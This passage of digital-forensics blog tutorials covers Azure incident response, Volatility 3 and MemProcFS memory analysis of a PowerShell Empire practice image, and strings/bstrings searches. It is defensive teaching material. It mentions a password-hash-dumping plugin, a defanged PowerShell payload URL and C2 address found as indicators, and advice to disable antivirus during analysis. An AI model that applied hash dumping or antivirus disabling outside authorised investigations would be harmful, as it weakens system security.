access to a compromised account or service. Networking : Virtual Networks (VNet) : Helps isolate resources and control network traffic. Network Security Groups (NSGs) : Filters network traffic, which can help track network traffic anomalies during an incident. Compute : Virtual Machines (VMs) : Key investigation targets in cases of compromised systems. Both Linux and Windows VMs are supported. Azure Functions : Provides compute-on-demand and could be abused by attackers for running scripts in a serverless environment. Storage : Disk Storage : Persistent storage for VMs. Investigators might need to examine disk snapshots or backups to analyze compromised systems. Blob Storage : REST-based object storage for storing unstructured data, which can be a target for data exfiltration. Storage Explorer : A graphical tool for viewing and interacting with Azure storage resources, useful for accessing storage data during investigations. Analytics : Log Analytics : Allows you to collect and search through logs, essential for tracking suspicious activity across resources. Azure Sentinel : A cloud-native SIEM (Security Information and Event Management) platform, which aggregates data from across the environment and uses intelligent analytics to identify and respond to potential threats. https://azure.microsoft.com/en-us/products/ ------------------------------------------------------------------------------------------------------------- Resource Identification in Azure: Understanding Resource IDs Azure resources are uniquely identified using a Universal Resource Identifier (URI) . This format helps trace individual resources and track their relationships within the Azure environment, which is critical during incident response. A typical resource URI follows this structure: /subscription//resourceGroups//providers/// SubscriptionId : The globally unique identifier for the subscription. resourceGroups : The user-generated name of the resource group. providerName : The resource provider responsible for managing that resource (e.g., Microsoft.Compute for VMs). resourceType : The type of resource (e.g., virtualMachines). resourceName : The specific name of the resource. For example, in the case of a virtual machine named "MiningVM": The resource ID might include URIs for the VM itself, the operating system (OS) disk, the network interface, and even a public IP address (if assigned). Investigators can use these URIs to track and manage each component of a compromised resoure ------------------------------------------------------------------------------------------------------------- ### Investigating Identity and Access: Role-Based Access Control (RBAC) Azure’s **Role-Based Access Control (RBAC)** is like a security guard at the gates of every resource . It defines who has access to what and what they can do with it —read, write, or delete. During an investigation, understanding RBAC is critical because you’ll need to know who had access to a compromised resource and whether their access was appropriate. For instance, each resource in Azure has a **scope**, which could be at the level of a management group, subscription, or resource group. A role assignment defines who (user or service account) can do what (role definition) within that scope. The most common roles are **Owner**, **Contributor**, and **Reader**, but custom roles can be created as well. Imagine you’re looking into an incident where sensitive data was leaked from a storage account. By examining RBAC, you might discover that a developer had unnecessary write access to the account, or that a third-party contractor was given too much control over key resources. https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles https://learn.microsoft.com/en-us/azure/role-based-access-control/overview ------------------------------------------------------------------------------------------------------------- ### Real-World Example: Tracing an Azure Security Breach Let’s put it all together with a simple example. Suppose a virtual machine (VM) in your Azure environment was hacked. You start your investigation by looking into the **subscription** where the VM resides. First, you check **Azure Resource Manager** to view the deployment history of the VM. By examining the **ARM template**, you see that the VM was configured with an outdated operating system, which may have been the entry point for the attacker. Next, you use **RBAC** to review who had access to the resource group containing the VM. You discover that a former employee still had **Owner** access, which allowed them to modify settings and potentially introduce vulnerabilities. Finally, you dive into **Log Analytics** to trace the attacker’s movements through the VM’s logs, giving you a clear picture of how the breach occurred. ------------------------------------------------------------------------------------------------------------- When it comes to managing user access in Microsoft Azure, especially during investigations, things can get complicated quickly. Azure uses Role-Based Access Control (RBAC) , which defines who has access to what resources and what they can do with those resources. The challenge comes when a user’s permissions are scattered across multiple subscriptions and resource groups. Administrators often need to enumerate role assignments  to fully understand a user’s level of access. Here’s how that can be achieved using Azure's tools. Listing User Role Assignments: Azure CLI and PowerShell The Azure CLI  and PowerShell  provide the most efficient ways to list user role assignments across different levels of Azure resources. Using Azure CLI to List Role Assignments The Azure CLI  allows you to enumerate role assignments by issuing a command to list all the roles a user has across resources. The steps are: Select the appropriate subscription : First, make sure you’ve selected the subscription that holds the resources you're investigating: az account set --subscription "subscription_name_or_id" List role assignments : Use the az role assignment list command to list all role assignments for a specific user within that subscription . The key parameters here are --all to search recursively and --assignee to specify the user. az role assignment list --all --assignee "user_email_or_id" This will list the user’s roles at both the subscription and resource group levels. If they have owner-level access to a specific resource group but no broader subscription access, this command will reveal that. Using PowerShell to List Role Assignments Similarly, you can achieve the same results using PowerShell  with the Get-AzRoleAssignment command. Install and set up Azure PowerShell :If you haven't already, install the Azure PowerShell module Install-Module -Name Az -AllowClobber Authenticate and select the subscription : Authenticate with your Azure account and choose the correct subscription. Connect-AzAccount Select-AzSubscription -SubscriptionId "subscription_id" List role assignments for the user : Use the following command to list role assignments: Get-AzRoleAssignment -ObjectId (Get-AzADUser -UserPrincipalName "user_email").Id This will return all roles assigned to the user, including those at the subscription or resource group level. Why This Matters for Investigations In cases where a security incident or breach is being investigated, it’s critical to understand who had access to what . For example, a user might not have direct access to a subscription but could hold Owner  permissions at a specific resource group or even an individual resource level, which could lead to security loopholes. If the user has elevated permissions—such as Owner  or Contributor —on critical resources, this could be an entry point for an attacker to escalate their control over the environment. Listing all role assignments helps pinpoint misconfigurations or excessive access that might have been leveraged during an attack. ------------------------------------------------------------------------------------------------------------- MITRE ATT&CK® and Azure: Understanding Threat Actor Behavior The MITRE ATT&CK® framework  provides an extensive matrix of tactics and techniques that threat actors commonly use when attacking cloud platforms like Azure. For instance, attackers frequently aim to: Obtain and verify credentials : Attackers often exploit legacy protocols like IMAP, which lack strong security measures. Enforcing multi-factor authentication (MFA)  and disabling legacy protocols are essential to mitigate these risks. Exfiltrate data via storage accounts : Attackers might abuse Azure’s Blob Storage  or use the Microsoft Graph API  to access and extract sensitive information. The MITRE ATT&CK framework has detailed mappings for Office 365 , Azure AD , and other Azure services, which makes it easier to correlate specific threat tactics with your security controls. Microsoft has even mapped its built-in Azure security controls against MITRE ATT&CK to create a library of 48 potential defenses. You can explore Azure security mappings here: MITRE ATT&CK for Cloud Azure Security Controls Mapped to MITRE ------------------------------------------------------------------------------------------------------------- Accessing Azure: CLI, Portal, PowerShell, and Graph API There are four primary ways to interact with Azure during your investigation or daily operations: Azure Portal : The graphical interface for viewing and managing Azure resources. Azure CLI : A command-line interface for automating resource management. PowerShell : Ideal for Windows users who prefer scripting in PowerShell to manage Azure. Microsoft Graph API : A RESTful API that allows programmatic access to Azure services, providing deep integration into apps and custom tools. The Azure CLI  and PowerShell  options are especially important for large-scale environments where running commands on the fly is necessary to quickly retrieve information. Cloud Shell —a terminal within the Azure Portal—also provides access to these tools without needing local installations. https://learn.microsoft.com/en-us/cli/azure/what-is-azure-cli https://learn.microsoft.com/en-us/cli/azure/install-azure-cli https://learn.microsoft.com/en-us/azure/cloud-shell/overview https://learn.microsoft.com/en-us/azure/cloud-shell/get-started/classic?tabs=azurecli Investigating Cloud Shell: Bash vs PowerShell Artifacts An interesting point to consider during an investigation is whether the attacker used Cloud Shell  for their activities. When a user initiates a Cloud Shell session, a storage account is automatically created to store the environment. If Bash  was used, traditional Linux forensics  can be applied, such as analyzing the .bash_history file to see the commands issued by the user. However, there’s a limitation: PowerShell Cloud Shell  leaves fewer artifacts. While the underlying actions will still be logged (e.g., through Azure Audit Logs ), direct forensics from PowerShell Cloud Shell is limited. https://learn.microsoft.com/en-us/azure/cloud-shell/get-started/classic?tabs=azurecli Conclusion Effectively managing and investigating user access in Azure requires understanding the nuances of role assignments across different subscriptions and resources. Tools like Azure CLI  and PowerShell  make it easier to enumerate these roles, while frameworks like MITRE ATT&CK®  provide insight into threat actor behavior in cloud environments. The right combination of access control, security controls, and investigative tools can significantly enhance your incident response capabilities in Azure. Akash Patel

  • "Step-by-Step Guide to Uncovering Threats with Volatility: A Beginner’s Memory Forensics Walkthrough"

    Alright, let’s dive into a straightforward guide to memory analysis using Volatility. Memory forensics is a vast field, but I’ll take you through an overview of some core techniques to get valuable insights. Let’s go Notes: "This is not a complete analysis; it’s an overview of key steps. In memory forensics, findings can be hit or miss—sometimes we uncover valuable data, sometimes we don’t, so it’s essential to work carefully." Step 1: Basic System Information with windows.info Let’s start by getting a basic overview of the memory image using the windows.info plugin. This gives us essential details like the operating system version, kernel debugging info, and more , which helps us ensure the plugins we’ll use are compatible. python3 vol.py -f /mnt/d/practice_powershell_empire/practice_powershell_empire.vmem windows.info Step 2: Listing Active Processes with windows.pslist Now, I’ll list all active processes using windows.pslist and save the output . This helps identify running processes, their parent-child relationships, and a general look at what’s happening in memory. p ython3 vol.py -f /mnt/d/practice_powershell_empire/practice_powershell_empire.vmem windows.pslist > ./testing/pslist.txt I’m storing the output so we can refer back to it easily . With pslist, we can identify processes and their parent-child links , which can help detect suspicious activity if any processes don’t align with expected behavior. (I am using the SANS Material to make sure processes aligned with parent child) Step 3: Finding Hidden Processes with windows.psscan Next, we move to windows.psscan, which scans for processes, even hidden ones that pslist might miss. This is especially useful for finding malware or processes that don’t show up in regular listings. python3 vol.py -f /mnt/d/practice_powershell_empire/practice_powershell_empire.vmem windows.psscan > ./testing/psscan.txt After running psscan, I’ll sort and compare the results with pslist  to see if anything stands out. A quick diff can reveal processes that may be hiding: sort ./testing/psscan.txt > ./testing/a.txt sort ./testing/pslist.txt > ./testing/b.txt diff ./testing/a.txt ./testing/b.txt In my analysis, I found some suspicious processes like whoami.exe and duplicate mscorsvw.exe  entries, which I’ll dig into further to verify their legitimacy. (Later analysis mscorsvw is legit ) Step 4: Examining Process Trees with windows.pstree To get a clearer view of how processes are linked, I’ll use windows.pstree. This shows the process hierarchy, making it easier to spot unusual or suspicious chains, like a random process launching powershell.exe  under a legitimate parent. python3 vol.py -f /mnt/d/practice_powershell_empire/practice_powershell_empire.vmem windows.pstree > ./testing/pstree.txt During my analysis, I noticed a powershell.exe instance that used encoded commands to connect to a suspicious IP (http[:]//192.168.200.128[:]3000/launcher.ps1). This could be an indicator of compromise, possibly indicating a malicious script being downloaded and executed. Step 5: Checking Command-Line Arguments with windows.cmdline Now, I’ll use the windows.cmdline plugin to check command-line arguments for processes. This is helpful because attackers often use command-line parameters to hide activity. python3 vol.py -f /mnt/d/practice_powershell_empire/practice_powershell_empire.vmem windows.cmdline > ./testing/ cmdline.txt Here, I’m filtering out standard system paths(System 32) to make it easier to focus on anything that might look unusual . If there’s any suspicious execution path, this command can help spot it quickly. (Make sure it doesn't means attacker run processes from comandline) cat ./testing/cmdline.txt | grep -i -v 'system32' Step 6: Reviewing Security Identifiers with windows.getsids To understand the permissions and user context of the processes we’ve identified as suspicious, I’ll check their Security Identifiers (SIDs) using windows.getsids . This can tell us who ran a specific process, helping narrow down potential attacker accounts. python3 vol.py -f /mnt/d/practice_powershell_empire/practice_powershell_empire.vmem windows.getsids > ./testing/getsids.txt I’m searching for the user that initiated each suspicious process to see if it’s linked to an unauthorized or unusual account. (For example if you see above screenshot we have identifed powershell and cmd execution) So i have searched through text file: cat ./testing/getsids.txt | grep -i cmd.exe Step 7: Checking Network Connections with windows.netscan Next, I’ll scan for open network connections with windows.netscan to see if any suspicious processes are making unauthorized connections . This is crucial for detecting any malware reaching out to a command-and-control (C2) server. python3 vol.py -f /mnt/d/practice_powershell_empire/practice_powershell_empire.vmem windows.netscan > ./testing/netscan.txt In this case, I found some closed connections to a suspicious IP (192.168.200.128:8443), initiated by powershell.exe. This further confirms the likelihood of malicious activity Step 8: Module Analysis with windows.ldrmodules To see if there are unusual DLLs or modules loaded into suspicious processes, I’ll use windows.ldrmodules. This can help catch injected modules or rogue DLLs. python3 vol.py -f /mnt/d/practice_powershell_empire/practice_powershell_empire.vmem windows.ldrmodules > ./testing/ldrmodule.txt cat ./testing/ldrmodule.txt | egrep -i 'cmd|powershell' In very simple language: If you see even single one false you have to analyse it manually whether its legit or not (Mostly you will got lot of false positive. This is where DFIR examiner is there to identify if this is legit) Step 9: Detecting Malicious Code with windows.malfind Finally, I’ll scan for potential malicious code within processes using windows.malfind . This command helps by detecting suspicious memory sections marked as PAGE_EXECUTE_READWRITE, which attackers often use. python3 vol.py -f /mnt/d/practice_powershell_empire/practice_powershell_empire.vmem windows.malfind > ./testing/malfind.txt Next step I have looked into PID for power shells/cmd. So i can dump those and run antivirus scan or use strings or bstrings. cat ./testing/malfind.txt | grep -i 'PAGE_EXECUTE_READWRITE' I have identified powershell PID and noted down dump an the powershell related malfind processes: (One by One) for PID 5908,6164,8308,1876 (as per screemshot) python3 vol.py -f /mnt/d/practice_powershell_empire/practice_powershell_empire.vmem windows.malfind --dump --pid 5908 Once done now u can run string or bstring to identify character in them or run full disk scan again dump or give it to reverse engineer(Thats on you) (There are commnds avaible you can use those, Again this is an overview you can dig deeper. More commmands you can find in my previous article) https://www.cyberengage.org/post/unveiling-volatility-3-a-guide-to-extracting-digital-artifacts -------------------------------------------------------------------------------------------------------- Digging into Registry Hives Step 1 Moving on to the registry, I’ll first check which hives are available using windows.registry.hivelist. Important hives like NTUSER.DAT can hold valuable info, including recently accessed files. python3 vol.py -f /mnt/d/practice_powershell_empire/practice_powershell_empire.vmem windows.registry.hivelist If you see above screenshot we have most important hives usrclass.dat and Ntuser.dat Fist get a offset of usrclass.dat - 0x9f0c25e75000 and ntuser.dat - 0x9f0c25be8000  in our case Than to check which data is avaible under these two hives: python3 vol.py -f /mnt/d/practice_powershell_empire/practice_powershell_empire.vmem windows.registry.printkey --offset 0x9f0c25be8000  As you can see screenshot little data is intact: After this you can do two things First dump these hives and use tool like registry explorer to analyse further like normal windows registry analysis or You can do is dump all the output in txt file and analyse it here your choice: Lets do with txt file: python3 vol.py -f /mnt/d/practice_powershell_empire/practice_powershell_empire.vmem windows.registry.printkey --offset 0x9f0c25be8000 --recurse > ./testing/ntuser.txt Step 2 Checking User Activity with UserAssist Plugin The userassist plugin helps verify i f specific applications or files were executed by the user— like PowerShell commands. Results may vary, and in this case, it might not yield any findings. Lets suppose this does not work out for me: than use the above ntuser.dat method dumping all userassist into .txt using --recurse and analyse manually (Just change the offset) example: python3 vol.py -f /mnt/d/practice_powershell_empire/practice_powershell_empire.vmem windows.registry.printkey --offset 0x9f0c25e75000 --recurse > ./testing/usrclss.txt Step 3 Scanning for Key Files with Filescan python3 vol.py -f /mnt/d/practice_powershell_empire/practice_powershell_empire.vmem windows.filescan > ./testing/filescan.txt See this is not necessary but why its important .(you can simply use above first and second steps to extract and dump for analysis using registry explorer or examining manually its on you Lets suppose you ran filescan and saved output and you want to check which if you hives like SAM hives or security hives: cat ./testing/filescan.txt | grep -i 'usrclass.dat' | grep 'analyst' This above command will grep usrclass,dat and then grep user analyst, because the powershell executed under user account analyst. Now after going through i have identified multiple hives there that might be useful. I have noted all the offset and what i am going to do is dump all the hives and analyse using registry explorer. Step 4 Dumping Specific Files (Like NTuser.dat, usrclass.dat) python3 vol.py -f /mnt/d/practice_powershell_empire/practice_powershell_empire.vmem windows.dumpfiles --virtaddr Use this for additional files or executable of interest. If data is retrieved, analyze it with tools like RegRipper. Step 5 Similar to above you can search for keyword "history" in filescan.txt if you find history files related to browser or psreadline.txt dump it out analyse it. If u dumping browser history us can browserhistory viewer from nirsoft Step 6 Logs Analysis you can search for logs in our case cat ./testing/filescan.txt | grep -i '.evtx' you can dump the logs and use evtxcmd to parse the logs and analyse it. ------------------------------------------------------------------------------------------------------------- Once done with volatility what i always do. run the strings or bstrings.exe against my Memory images using the IOC i have identified to look for if i can get extra hit and i missed out something example: (If you look above i have found launches.ps1 in IOCs) running strings and bstring again the memory image bstring | grep -i 'launcher.ps1' Below screenshot i looked for IP we have identified as IOC This is what i do after running volatility you do not have do it but its on you! How to run strings/bstrings.exe there is article created link below do check it out https://www.cyberengage.org/post/memory-forensics-using-strings-and-bstrings-a-comprehensive-guide ------------------------------------------------------------------------------------------------------------- Next I have run MemProc5 Analyzer: Dirty Logs in MemProcFS Examining logs, such as those found in MPLogs\Dirty\, reveals possible threats, like PowerShell Grampus or Mimikatz: There are legit files as well u have to defined its legit or not How to run MemProc5 there is article created link below do check it out https://www.cyberengage.org/post/memprocfs-memprocfs-analyzer-comprehensive-analysis-guide ------------------------------------------------------------------------------------------------------------- Conclusion Alright, so we’ve walked through a high-level approach to memory forensics here. E ach tool and plugin we used, like Volatility and MemProcFS, gave us a way to dig into different artifacts, whether it was registry entries, logs, or user files. Some methods hit, some miss—memory analysis can be like that, but the key is to stay thorough. Remember, you may or may not find everything you’re looking for. But whatever you do uncover, like IOCs or specific user actions, adds to your investigation . Just keep at it, keep testing, and let each artifact guide your next step. This is all part of the process—memory forensics is about making the most out of what you have, one artifact at a time. Akash Patel

  • MemProcFS/MemProcFS Analyzer: Comprehensive Analysis Guide

    MemProcFS  is a powerful memory forensics tool that allows forensic investigators to mount raw memory images as a virtual file system . This enables direct analysis of memory artifacts without the need for heavy processing tools. It simplifies the process by converting the memory dump into a filesystem with readable structures like processes, drivers, services, etc. This guide covers best practices for using MemProcFS, from mounting a memory image to performing in-depth analysis using various tools and techniques. -------------------------------------------------------------------------------------------------------- Mounting the Image with MemProcFS The basic command to mount a memory dump using MemProcFS is: MemProcFS.exe -device c:\temp\memdump-win10x64.raw This mounts the memory dump as a virtual file system. However, the best way to use MemProcFS is by taking advantage of its built-in Yara rules  provided by Elastic. These Yara rules allow you to scan for Indicators of Compromise (IOCs) such as malware signatures, suspicious files, and behaviors within the memory image. Command with Elastic Yara Rules To mount a memory image and enable Elastic's Yara rules, use the following command: MemProcFS.exe -device -forensic 1 -license-accept-elastic-license-2.0 The -forensic 1 flag ensures that the image is mounted with forensic options enabled, while the -license-accept-elastic-license-2.0 flag accepts Elastic's license terms for the built-in Yara rules. -------------------------------------------------------------------------------------------------------- Methods for Analysis There are multiple ways to analyze the mounted memory image. Below are the three most common methods: Using WSL (Windows Subsystem for Linux) Using Windows Explorer Using MemProcFS Analyzer Suite 1. Analyzing with WSL (Windows Subsystem for Linux) One of the most efficient ways to analyze the memory dump is by using the Linux shell within Windows, i.e., WSL . By doing this, you can easily use Linux tools such as grep, awk, and strings to filter and search through the mounted image. Step 1: Create a Directory in WSL First, create a directory in WSL where you will mount the memory image: sudo mkdir /mnt/d Step 2: Mount the Windows Memory Image to WSL Next, mount the Windows memory image to the directory you just created. Assuming the image is mounted on the M: drive in Windows, you can mount it to WSL with the following command: sudo mount -t drvfs M: /mnt/d This command mounts the M: drive (where MemProcFS has mounted the memory image) to the /mnt/d directory in WSL . Now you can access the mounted memory dump via WSL for further analysis using grep, awk, strings, and other Linux-based utilities. -------------------------------------------------------------------------------------------------------- 2. Analyzing with Windows Explorer MemProcFS makes it easy to browse the memory image using Windows Explorer  by exposing critical memory artifacts in a readable format. Here’s what each folder contains: Key Folders and Files Sys Folder : Proc : Proc.txt: Lists processes running in memory. Proc-v.txt: Displays detailed command-line information for the processes. Drivers : ers.txt: Contains information about drivers loaded in memory. Net : Netstat.txt: Lists network information at the time of acquisition. Netstat-v.txt: Provides details about network paths used by processes. Services : Services.txt: Lists installed services. Subfolder /byname: Provides detailed information for each service. Tasks : Task.txt: Contains information about scheduled tasks in memory. Name Folder : Contains folders for each process with detailed information such as files, handles, modules, and Virtual Address Descriptors (VADs). PID Folder : Similar to the Name Folder , but uses Process IDs (PIDs) instead of process names. Registry Folder : Contains all registry keys and values available in memory during the dump. Forensic Folder : CSV files  (e.g., pslist.csv): Easily analyzable using Eric Zimmerman's tools. Timeline : Contains timestamped events related to memory activity, available in both .csv and .txt formats. Files Folder : Attempts to reconstruct the system's C: drive from memory. NTFS Folder : Attempts to reconstruct the NTFS file system structure from memory. Yara Folder : Contains results from Yara scans, populated if Yara scanning is enabled. FindEvil Folder: You must determine if files are malicious or legitimate. -------------------------------------------------------------------------------------------------------- 3. Using MemProcFS Analyzer Suite For more automated analysis, MemProcFS comes with an Analyzer Suite that simplifies the process by running pre-configured scripts to extract and analyze data from the memory image. Step 1: Download and Install Analyzer Suite First, download the MemProcFS Analyzer Suite . Inside the suite folder, you will find a script named updater.ps1. Run this script in PowerShell  to d ownload all the necessary binaries and tools for analysis: Step 2: Run the Analyzer Once the setup is complete, you can begin your automated analysis by running the MemProcFS-Analyzer.ps1 script: .\MemProcFS-Analyzer.ps1 This will launch the GUI  for MemProcFS Analyzer . You can then select the mounted memory image and (optionally) the pagefile if it is available. Once you run the analysis, MemProcFS will automatically extract and analyze the data . -------------------------------------------------------------------------------------------------------- Output and Results After running the MemProcFS analysis, the results will be saved in a folder under the script directory. Make sure that you have 7-Zip  installed, as some of the output may be archived. The default password for the archives is MemProcFS . Key Output Files : Parsed Files : Contains all the data successfully parsed by MemProcFS. Unparsed Files : Lists data that could not be parsed by the tool. For further analysis, you can manually review these files using tools like Volatility 3  or by leveraging WSL tools. By reviewing both parsed and unparsed files, you can ensure that no critical information is missed during the analysis. -------------------------------------------------------------------------------------------------------- Considerations and Best Practices Antivirus Interference If you are running MemProcFS Analyzer in a environment, your antivirus software may block certain forensic tools. To avoid interruptions, it is recommended to create exclusions for the tools used by MemProcFS Analyzer or, if necessary, temporarily disable the antivirus software during the analysis. Manual Review of Unparsed Data While MemProcFS automates many aspects of memory forensics, it is crucial to manually check files that were not parsed during the automated process. These files can be analyzed using other memory forensic tools like Volatility 3 , or through manual inspection using WSL commands. -------------------------------------------------------------------------------------------------------- Conclusion MemProcFS  offers a powerful and efficient way to analyze memory dumps by mounting them as a virtual file system. This method allows for both manual and automated analysis using familiar tools like grep, awk, strings, and the MemProcFS Analyzer Suite . Whether you are performing quick IOC triage or a detailed forensic analysis, MemProcFS can handle a wide range of memory artifacts, from processes and drivers to network activity and registry keys. Key Takeaways : MemProcFS is versatile, offering both manual and automated analysis methods. Use Elastic’s built-in Yara rules to enhance your malware detection capabilities. Leverage WSL or Windows Explorer to manually browse and analyze memory artifacts. The Analyzer Suite automates much of the forensic process, saving time and effort. Always review unparsed files to ensure nothing critical is missed. Akash Patel

  • Memory Forensics Using Strings and Bstrings: A Comprehensive Guide

    Memory forensics  involves extracting and analyzing data from a computer's volatile memory (RAM) to identify potential Indicators of Compromise (IOCs) or forensic artifacts crucial for incident response. This type of analysis can uncover malicious activity, such as hidden malware, sensitive data, and encryption keys, even after a machine has been powered off. Two key tools frequently used in this process are Strings  and Bstrings . While both help extract readable characters from memory dumps, they offer distinct features that make them suitable for different environments. In this article, we’ll cover the functionality of both tools, provide practical examples, and explore how they can aid in quick identification of IOCs during memory forensics. Tools Overview 1. Strings Functionality : Extracts printable characters from files or memory dumps. Usage : Primarily used in Linux/Unix environments , although it can be utilized in other systems via compatible setups.(Example Windows WSL) Key Features : Lightweight and easy to use. Can be combined with search filters like grep to narrow down relevant results. 2. Bstrings (by Eric Zimmerman) Functionality : A similar tool to Strings, but d esigned specifically for Windows environments. It offers additional features such as regex support  and advanced filtering. Key Features : Regex support for powerful search capabilities. Windows-native, making it ideal for handling Windows memory dumps. Capable of offset-based searches. Basic Usage 1. Using Strings in Linux/Unix Environments The strings tool is commonly used to extract printable (readable) characters from binary files, such as memory dumps. Its core functionality is simple but powerful when combined with additional filters, such as grep. Example: Extracting IP Addresses If you are hunting for a specific IOC, such as an IP address in a memory dump , you can extract printable characters and pipe the results through grep to filter the output. strings | grep -I Example for an IP address : strings mem.dump | grep -i 192\.168\.0\. This command will extract any printable characters from the memory dump (mem.dump) and filter the results for the IP address 192.168.0.*. Example for a filename : strings mem.dump | grep -i akash\.exe Here, it searches for the filename akash.exe within the memory dump. Note : For bstrings.exe in Windows, the same search can be done without using escape characters (\). This makes it easier to input IP addresses or filenames directly: IP address : 192.168.0 Filename : akash.exe ----------------------------------------------------------------------------------------------- 2. Contextual Search Finding an IOC in a memory dump is only the beginning. To better understand the context in which the IOC appears, y ou may want to see the lines surrounding the match. This can give insights into related processes, network connections, or file paths. strings | grep -i -C5 Example : strings mem.dump | grep -i -C5 akash.exe The -C5 option tells grep to show five lines above and five lines below the matching IOC (akash.exe). This helps to investigate the surrounding artifacts and provides additional context for analysis. ----------------------------------------------------------------------------------------------- 3. Advanced Usage with Offsets When you use strings with volatility (another powerful memory forensics tool) , it’s essential to retrieve offsets. Offsets allow you to pinpoint the exact location of an artifact within the memory image , which is vital for correlating with other forensic evidence. strings -tx | grep -i -C5 Example : strings -tx mem.dump | grep -i -C5 akash.exe Here, the -tx option provides the offsets of the matches within the file, allowing for more precise analysis, especially when using memory analysis tools like Volatility. ----------------------------------------------------------------------------------------------- Using Bstrings.exe in Windows The bstrings.exe tool operates similarly to strings, but is designed for Windows environments and includes advanced features such as regex support  and output saving . Basic Operation bstrings.exe -f "E:\ForensicImages\Memory\mem.dmp" --ls This command extracts printable characters from the specified memory dump and searches for a specific pattern or IOC. Example : bstrings.exe -f "E:\ForensicImages\Memory\mem.dmp" --ls qemu-img-win-x64-2_3_0.zip ----------------------------------------------------------------------------------------------- Regex Support Bstrings offers regex pattern matching, allowing for flexible searches. This can be especially useful when looking for patterns like email addresses, MAC addresses, or URLs. Example of listing available regex patterns : bstrings.exe -p Example of applying a regex pattern for MAC addresses : bstrings.exe -f "E:\ForensicImages\Memory\mem.dmp" --lr mac ----------------------------------------------------------------------------------------------- Saving the Output Often, forensic investigators need to save the results for later review or for reporting. Bstrings allows easy output saving. bstrings.exe -f "E:\ForensicImages\Memory\mem.dmp" -o output.txt This saves the output to output.txt for future reference or detailed analysis. ----------------------------------------------------------------------------------------------- Practical Scenarios for Memory Forensics Corrupted Memory Image In certain cases, memory images may be corrupted or incomplete . Tools like Volatility or MemProc may fail to process these images. In such scenarios, strings and bstrings.exe can still be incredibly useful by extracting whatever readable data remains , allowing you to salvage critical IOCs. Quick IOC Identification These tools are particularly valuable for triage . During an investigation, quickly scanning a memory dump for IOCs (such as suspicious filenames, IP addresses, or domain names) can direct the next steps of a forensic investigation. If no IOCs are found, the investigator can move on to more sophisticated or time-consuming methods. ----------------------------------------------------------------------------------------------- Conclusion Memory forensics is a crucial part of modern incident response, and tools like strings and bstrings.exe can significantly accelerate the process . Their ability to extract readable characters from memory dumps and apply search filters makes them invaluable for forensic investigators, especially in cases where traditional analysis tools may fail. Key Takeaways : Strings  is ideal for Unix/Linux environments, while Bstrings  is tailored for Windows. Both tools offer powerful search capabilities, including contextual search  and offset-based analysis . Bstrings  provides additional features like regex support  and output saving . These tools help quickly identify IOCs, even in challenging scenarios like corrupted memory images. Whether you’re dealing with a large memory dump or a corrupted image, these tools offer a simple yet effective way to sift through data and uncover critical forensic artifacts Akash Patel

  • Unveiling Volatility 3: A Guide to Installation and Memory Analysis on Windows and WSL

    Today, let's dive into the fascinating world of digital forensics by exploring Volatility 3 —a powerful framework used for extracting crucial digital artifacts from volatile memory (RAM). Volatility enables investigators to analyze a system’s runtime state, providing deep insights into what was happening at the time of memory capture. While some forensic suites like OS Forensics  offer integrated Volatility functionality, this guide will show you how to install and run Volatility 3  on Windows  and WSL  (Windows Subsystem for Linux). Given the popularity of Windows, it's a practical starting point for many investigators. Moreover, WSL allows you to leverage Linux-based forensic tools, which can often be more efficient. Installing Volatility 3 on Windows: Before diving in, ensure you have three essential tools installed: Python 3: Download Python 3 from the Microsoft Store. Git for Windows: Click here Microsoft C++ Build Tool: Download it Once these tools are installed, follow these steps to set up Volatility 3: Head to the Volatility GitHub repository here . Copy the repository link. Open PowerShell and run: git clone Check the Python version using: python -V Navigate to the Volatility folder in PowerShell and run DIR (for Windows) or ls (for Linux). Run the command: pip install -r .\requirements.txt Verify the Volatility version: python vol.py -v Extracting Digital Artifacts: Now that Volatility is set up, you'll need a memory image to analyze. You can obtain this image using tools like FTK Imager or other image capture tools . -------------------------------------------------------------------------------------------------------- H ere are a few basic commands to get you started: python vol.py -v (Displays tool information). python vol.py -f D:\memdump.mem windows.info Provides information about the Windows system from which the memory was collected. Modify windows.info for different functionalities. D:\memdump.mem (Path of memory image) 3. python vol.py -f D:\memdump.mem windows.handles - Lists handles in the memory image. Use -h for the help menu. Significance of -pid Parameter in Memory Forensics is used as a parameter. Now you guys will think what's point using python in volatility 3. python vol.py -f D:\memdump.mem windows.pslist | Select-String chrome This command showcases the use of a search string (Select-String) to filter the pslist output for specific processes like 'chrome.' While Select-String isn't a part of Volatility 3 itself, integrating it with Python offers a similar functionality to 'grep' in Linux, facilitating data extraction based on defined criteria. Few Important commands: windows.pstree (Will give hierarchy view) windows.psscan (find unlinked hidden processes) windows.netstat windows.cmdline (what haven been run from where it have been run any special arguments he used) windows.malfind (in case of legit you will not get anything for legit processes) windows.hashdump (showed hash password on windows) windows.netscan Windows.ldrmodules A "True" within a column means the DLL was present, and a "False" means the DLL was not present in the list. By comparing the results, we can visually determine which DLLs might have been unlinked or suspiciously loaded, and hence malicious. More commands with details you will found in this link click here ------------------------------------------------------------------------------------------------------------- Why Switch to WSL for Forensics? As forensic analysis evolves, using Windows Subsystem for Linux (WSL)  has become a more efficient option for running tools like Volatility 3 . With WSL, you can run Linux-based tools natively on your Windows machine, giving you the flexibility and compatibility benefits of a Linux environment without the need for dual-booting or virtual machines. Install WSL by running: wsl --install https://learn.microsoft.com/en-us/windows/wsl/install To install Volatility 3 on WSL : 1. Install Dependencies Before installing Volatility 3, you need to install the required dependencies: s udo apt update sudo apt install -y python3-pip python3-pefile python3-yara 2. Installing PyCrypto (Optional) While PyCrypto  was a common requirement, it is now considered outdated. If installing it works, great! If not, you can move on: pip3 install pycrypto If PyCrypto doesn’t install correctly, don’t worry—Volatility 3 can still function effectively without it in most cases. 3. Clone the Volatility 3 Repository Next, clone the official Volatility 3  repository from GitHub: git clone https://github.com/volatilityfoundation/volatility3.git cd volatility3 4. Verify the Installation To confirm that Volatility 3 is installed successfully, run the following command to display the help menu: python3 vol.py -h | more If you see the help options, your installation was successful, and you’re ready to begin memory analysis. ------------------------------------------------------------------------------------------------------------ Why WSL is Essential for Forensic Analysis Forensic tools like Volatility 3  often run more smoothly in a Linux environment due to Linux’s lightweight nature and better compatibility with certain dependencies and libraries. WSL allows you to run a full Linux distribution natively on your Windows machine without the need for a virtual machine or dual-booting . This means you can enjoy the power and flexibility of Linux while still working within your familiar Windows environment. ---------------------------------------------------------------------------------------------------- Conclusion Forensic analysis, especially with tools like Volatility 3 , becomes far more efficient when leveraging WSL . It offers better performance, compatibility with Linux-based tools, and ease of maintenance compared to traditional Windows installations. I hope 